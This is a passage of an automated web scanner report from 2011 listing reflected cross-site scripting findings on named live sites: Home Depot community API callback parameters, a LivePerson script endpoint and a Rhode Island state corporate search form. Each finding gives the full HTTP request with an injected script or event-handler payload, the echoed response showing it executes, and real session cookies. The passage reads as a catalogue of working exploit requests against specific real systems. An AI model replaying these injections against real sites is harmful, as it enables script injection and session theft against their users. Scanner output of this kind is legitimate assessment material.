Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 600
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp13104885296198d1a9<img src=a onerror=alert(1)>02e074b4b25({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/build","id":{"type":"string","$":"build"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","$":"
...[SNIP]...

3.6. http://community.homedepot.com/restapi/vc/boards/id/lawns [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/lawns

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1e87e<img%20src%3da%20onerror%3dalert(1)>eba813800c3 was submitted in the callback parameter. This input was echoed as 1e87e<img src=a onerror=alert(1)>eba813800c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/lawns?xslt=json.xsl&callback=jsonp13104885296211e87e<img%20src%3da%20onerror%3dalert(1)>eba813800c3 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 637
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp13104885296211e87e<img src=a onerror=alert(1)>eba813800c3({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/lawns","id":{"type":"string","$":"lawns"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","$":"
...[SNIP]...

3.7. http://community.homedepot.com/restapi/vc/boards/id/replace [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/replace

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5c71<img%20src%3da%20onerror%3dalert(1)>070705f0df3 was submitted in the callback parameter. This input was echoed as f5c71<img src=a onerror=alert(1)>070705f0df3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/replace?xslt=json.xsl&callback=jsonp1310488529617f5c71<img%20src%3da%20onerror%3dalert(1)>070705f0df3 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 608
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp1310488529617f5c71<img src=a onerror=alert(1)>070705f0df3({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/replace","id":{"type":"string","$":"replace"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","
...[SNIP]...

3.8. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload ad89c%0aa7074f0f5d5 was submitted in the site parameter. This input was echoed as ad89c
a7074f0f5d5
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=57386690ad89c%0aa7074f0f5d5&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQSATCQQT=POMBMBKDCKNCLFAFAHDBCMPC; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690ad89c
a7074f0f5d5

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

3.9. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [ActiveFlagCrit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the ActiveFlagCrit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4392f"><script>alert(1)</script>558a4aa6fa8 was submitted in the ActiveFlagCrit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y4392f"><script>alert(1)</script>558a4aa6fa8&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=ActiveFlagCrit value="Y4392f"><script>alert(1)</script>558a4aa6fa8">
...[SNIP]...

3.10. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Address parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the Address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 843a1"><script>alert(1)</script>d889694b614 was submitted in the Address parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=843a1"><script>alert(1)</script>d889694b614&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&FilingNum=&Batc
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=Address value="843a1"><script>alert(1)</script>d889694b614">
...[SNIP]...

3.11. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [AgentName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the AgentName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6fa"><script>alert(1)</script>08ee8de438 was submitted in the AgentName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=7e6fa"><script>alert(1)</script>08ee8de438&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&Filing
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8554
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=AgentName value="7e6fa"><script>alert(1)</script>08ee8de438">
...[SNIP]...

3.12. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntityName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the EntityName request parameter is copied into the HTML document as plain text between tags. The payload dbe0c<script>alert(1)</script>9f9c99aea8 was submitted in the EntityName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xssdbe0c<script>alert(1)</script>9f9c99aea8&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&Fi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8592
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<u>xssdbe0c<script>alert(1)</script>9f9c99aea8</u>
...[SNIP]...

3.13. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntitySearchMethod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the EntitySearchMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e30"><script>alert(1)</script>4cfbec7b07a was submitted in the EntitySearchMethod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=Be6e30"><script>alert(1)</script>4cfbec7b07a&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFe
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8543
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=SearchMethod value="Be6e30"><script>alert(1)</script>4cfbec7b07a">
...[SNIP]...

3.14. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [FirstName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350f"><script>alert(1)</script>44583332d2b was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=7350f"><script>alert(1)</script>44583332d2b&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityNam
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=FirstName value="7350f"><script>alert(1)</script>44583332d2b">
...[SNIP]...

3.15. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [LastName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9bf"><script>alert(1)</script>9f858503452 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=9e9bf"><script>alert(1)</script>9f858503452&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&Old
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private


<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations -&nbsp;Public Browse and Search</title>

<style type="text/css">
.label {
   font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=LastName value="9e9bf"><script>alert(1)</script>9f858503452">
...[SNIP]...

3.16. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [MiddleName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ucc.state.ri.us
Path:   /CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the MiddleName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8668e"><script>alert(1)</script>3a488b53b99 was submitted in the MiddleName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
